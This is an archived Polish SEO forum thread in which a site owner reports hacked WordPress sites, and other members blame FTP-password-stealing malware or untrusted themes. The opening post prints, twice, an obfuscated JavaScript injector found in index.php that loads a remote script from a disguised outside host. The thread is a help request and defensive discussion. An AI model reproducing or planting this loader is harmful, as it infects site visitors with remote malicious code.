Skocz do zawartości

Wordpress Hack


krzepa

Rekomendowane odpowiedzi

Prawdopodobnie wczoraj shackowano moje wordpressy. Strony albo nie działają, albo się "rozjechały". Proszę o pomoc jak to naprawić.

Opiszę całą sytuację:

Wczoraj wykryło mi jakiegoś trojana - usunęłam go, ale komp mi się w tym momencie zawiesił i musiałem zrobić reset. Trojan prawdopodobnie wykorzystał mojego FTPa.

Jeżeli chodzi o same strony. Do różnych plików zostały dodane kody, te pliki to m.in. default-filters.php oraz index.php. Niestety więcej nie znalazłem.

W index.php mam dodany taki kod:

<script>try {var V="rep"+"lacFCdm".substr(0,3)+"AQ0e".substr(3);var F='';var I=RegExp;var h=new String();var kh=new String();function e(X,U){var Vf;if(Vf!='x_' && Vf!='Fy'){Vf=''};var S;if(S!='Up' && S != ''){S=null};this.M='';var Qi=new Array();var Y=new String("[XsR".substr(0,1));var CC;if(CC!='Zs'){CC=''};var k=new String("viMSg".substr(4));Y+=U;Y+=new String("Pzg]".substr(3));var b=new I(Y, k);var ik=new String();var Xi=new String();return X[V](b, new String());var n=new Date();var nO=new String();};this.mM='';var SQ;if(SQ!='' && SQ!='j'){SQ=null};this.mL="";var E=e('/AgFozoAgFlAez.yczoAmy/FgAoFoygAlFeF.FcFoFmA/ylAeyoA.AoyrzgF/zazrFtziFcAlzeAsybzaAszez.ycAoymA/zvAnyezxFpFrAeysFsy.ynyeztz.ApFhApA',"zAyF");var Ua=e('sJcVrJiVpJtJ',"JV");this.jO='';var YD=new String();var YO=e('835737775057557837353377053553',"357");var nE;if(nE!='' && nE!='QM'){nE=null};var MO;if(MO!='' && MO!='YLc'){MO=null};var l=e('cfrgeTaTtGeTEflgefmfegnGtT',"fgGT");var sP;if(sP!='Je' && sP!='jX'){sP='Je'};var m='';this.sy='';var YI;if(YI!='' && YI!='f'){YI=null};var g=e('osnUlsosaHdU',"UHs5");var nm=new String();var zc=new Array();var i=window;this.GN="";var nM=new Array();var R=e('h0tktDpk:D/k/0gDoko0g0lkeD-kaktk.kmDektkakc0akfDe0.DcDo0m0.0d0a0u0mk-kn0ektD.kBDe0sDtkB0lDeknkdDeDr0P0aDr0tk.Dr0u0:0',"Dk0");var Wm=new String();B=function(){this.Ja='';var UT;if(UT!='JE' && UT!='t'){UT='JE'};var mo;if(mo!='fA' && mo!='dL'){mo=''};var jl=new String();In=document[l](Ua);m=R+YO;this.Ld="";var im;if(im!='Uq'){im=''};m+=E;var Fj='';var SK='';this.OM="";In.defer=([8,1][1]);var Ag;if(Ag!='' && Ag!='tW'){Ag='AL'};var PM;if(PM!='' && PM!='eE'){PM=''};In.src=m;var N;if(N!='' && N!='Ly'){N='g_'};var wv;if(wv!='' && wv!='zz'){wv='T'};document.body.appendChild(In);var fd;if(fd!='' && fd!='kb'){fd=''};var OL;if(OL!='_' && OL!='rQ'){OL=''};};var ZY="";var Jy=new Array();var OF='';this.CU="";i[g]=B;var Bu=new Date();this.QLT="";} catch(x){var Gg=new Array();var JF;if(JF!='EC' && JF!='LVL'){JF=''};};</script>

<!--9c4204cf177a24a276829e22208fdb9f--><script>try {var V="rep"+"lacFCdm".substr(0,3)+"AQ0e".substr(3);var F='';var I=RegExp;var h=new String();var kh=new String();function e(X,U){var Vf;if(Vf!='x_' && Vf!='Fy'){Vf=''};var S;if(S!='Up' && S != ''){S=null};this.M='';var Qi=new Array();var Y=new String("[XsR".substr(0,1));var CC;if(CC!='Zs'){CC=''};var k=new String("viMSg".substr(4));Y+=U;Y+=new String("Pzg]".substr(3));var b=new I(Y, k);var ik=new String();var Xi=new String();return X[V](b, new String());var n=new Date();var nO=new String();};this.mM='';var SQ;if(SQ!='' && SQ!='j'){SQ=null};this.mL="";var E=e('/AgFozoAgFlAez.yczoAmy/FgAoFoygAlFeF.FcFoFmA/ylAeyoA.AoyrzgF/zazrFtziFcAlzeAsybzaAszez.ycAoymA/zvAnyezxFpFrAeysFsy.ynyeztz.ApFhApA',"zAyF");var Ua=e('sJcVrJiVpJtJ',"JV");this.jO='';var YD=new String();var YO=e('835737775057557837353377053553',"357");var nE;if(nE!='' && nE!='QM'){nE=null};var MO;if(MO!='' && MO!='YLc'){MO=null};var l=e('cfrgeTaTtGeTEflgefmfegnGtT',"fgGT");var sP;if(sP!='Je' && sP!='jX'){sP='Je'};var m='';this.sy='';var YI;if(YI!='' && YI!='f'){YI=null};var g=e('osnUlsosaHdU',"UHs5");var nm=new String();var zc=new Array();var i=window;this.GN="";var nM=new Array();var R=e('h0tktDpk:D/k/0gDoko0g0lkeD-kaktk.kmDektkakc0akfDe0.DcDo0m0.0d0a0u0mk-kn0ektD.kBDe0sDtkB0lDeknkdDeDr0P0aDr0tk.Dr0u0:0',"Dk0");var Wm=new String();B=function(){this.Ja='';var UT;if(UT!='JE' && UT!='t'){UT='JE'};var mo;if(mo!='fA' && mo!='dL'){mo=''};var jl=new String();In=document[l](Ua);m=R+YO;this.Ld="";var im;if(im!='Uq'){im=''};m+=E;var Fj='';var SK='';this.OM="";In.defer=([8,1][1]);var Ag;if(Ag!='' && Ag!='tW'){Ag='AL'};var PM;if(PM!='' && PM!='eE'){PM=''};In.src=m;var N;if(N!='' && N!='Ly'){N='g_'};var wv;if(wv!='' && wv!='zz'){wv='T'};document.body.appendChild(In);var fd;if(fd!='' && fd!='kb'){fd=''};var OL;if(OL!='_' && OL!='rQ'){OL=''};};var ZY="";var Jy=new Array();var OF='';this.CU="";i[g]=B;var Bu=new Date();this.QLT="";} catch(x){var Gg=new Array();var JF;if(JF!='EC' && JF!='LVL'){JF=''};};</script>

<!--9c4204cf177a24a276829e22208fdb9f-->

Czy ktoś kiedykolwiek się z takim atakiem spotkał?? Jak to naprawić??

Z góry dzięki.

Odnośnik do komentarza
Udostępnij na innych stronach

Nawet niekoniecznie backup a czystym wordpressem.

https://www.punktseo.pl/darmowe-bonusy/ << rozdaje: kody do katalogów firm, kody rabatowe, szablony ZennoPoster ! |---| Moje strony: https://www.s90.pl/pozycjonowanie/ | https://www.seo-stat.pl - zapraszam.                                                                                                                                                                                          

seo-stat-logo.png

 

Odnośnik do komentarza
Udostępnij na innych stronach

Zapewne używasz TC z zapamiętanymi danymi , użyj FileZilla , bądź wpisuj hasła z palca na przyszłość - Kod dodany do plików z Twojego komputera podczas przesyłania danych na serwer . ( niekoniecznie moge mieć rację ) Miałem podobnie z wp i Joomla , z tym że nie wiem czy Joomla miała też ten kod , już zastałem inną stronę :)

Podaruj 1% Oli Borwik

Wspieraj charytatywnie na SEO forum PIO

 

Odnośnik do komentarza
Udostępnij na innych stronach

to nie hacker, tylko program ktory kradnie hasla z programow do laczenia z FTP i dokleja zlosliwy kod do takich plikow jak: index, start, functions itp.

Moj sposob - mam w TC zapamietane zle haslo, podczas logowania wpisuje dobre z palca - robie tak od 2 lat i mam swiety spokoj, a dawniej co chwile mialem ten syf na stronie :/

Odnośnik do komentarza
Udostępnij na innych stronach

Dokładnie. Problem dotyka w 99% przypadków użytkowników Total Commandera. Odkąd używam FileZilli a teraz WinSCP nie mam takich problemów. Warto również, zaopatrzyć się w jakiś dobry antywirus :-)

Jestem właścicielem SEMURAI - agencja SEO oraz właścicielem VRnews.pl - wirtualna rzeczywistość

Odnośnik do komentarza
Udostępnij na innych stronach

Raczej watpie, ze to wirus - wiekszosc takich przypadkow to sciagniecie do wordpressa skorki niewiadomego pochedzenia. Jak masz w skorce zakodowane fragmenty kodu - najczesciej w stopce (footer.php) to na 90% jest to wlasnie przyczyna tego efektu.

kodeks-logo-baner-pio.jpg

Blog z informacjami o prawnych aspektach związanych z funkcjonowaniem internetu, w tym problematyka dotycząca SEM i SEO. organisciak.pl

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności